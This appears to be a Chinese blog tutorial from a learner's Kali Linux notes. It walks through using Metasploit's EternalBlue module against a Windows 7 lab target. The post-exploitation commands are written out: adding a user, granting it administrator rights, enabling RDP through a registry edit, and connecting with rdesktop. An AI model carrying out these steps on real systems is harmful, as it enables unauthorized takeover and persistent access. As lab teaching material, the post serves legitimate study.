首页 > 其他 > 详细

kali系统——网络安全v6笔记总结(四)

时间:2019-04-19 16:24:22      阅读:142      评论:0      收藏:0      [点我收藏+]
利用永恒之蓝漏洞实现w7远程操控
首先目标要关闭防火墙
技术分享图片
技术分享图片
技术分享图片
然后打开Metasploit
技术分享图片
输入永恒之蓝漏洞编码
技术分享图片
复制运行第二条辅助项目
技术分享图片
设置漏洞选项
技术分享图片
运行项目,结果为有一个可能是漏洞的w7漏洞
技术分享图片
然后选择第三个项目,即***项目,并设置漏洞选项
技术分享图片
技术分享图片
输入漏洞***命令 exploit
技术分享图片
于是我们便进入了对方的w7命令终端,身份为最高权限者system(系统)
技术分享图片
下一步我们输入命令net user 用户名 密码 /add来创建一个用户
然后用一个 net localgroup administrators 用户名 /add 命令来将刚才的用户拉入讨论组
然后输入命令 net localgroup administrators 查看管理员

输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 来开启远程桌面端口3389

/v 所选项之下要添加的值名。
/t RegKey 数据类型
/d 要分配给添加的注册表 ValueName 的数据。
/f 不用提示就强行覆盖现有注册表项。
现在我们就可以利用其他漏洞进行以远程桌面控制为渠道的******了

sessions -l 列出会话
sessions -i <id>选择会话
sessions -k <id> 结束会话
<ctrl> z 把会话放在后台
<ctrl> c 结束会话

kali终端窗口
rdesktop 192.168.4.239:3389 远程连接命令

kali系统——网络安全v6笔记总结(四)

原文:https://blog.51cto.com/14216854/2381436

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!